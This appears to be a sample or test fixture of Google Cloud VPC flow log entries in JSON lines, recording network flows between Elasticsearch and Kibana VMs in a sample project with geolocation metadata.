+{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"67.43.156.13","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"67.43.156.13","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"67.43.156.13","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"67.43.156.14","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.14","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"67.43.156.13","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"67.43.156.13","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"67.43.156.13","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"67.43.156.13","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"67.43.156.13","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} +{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"67.43.156.13","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 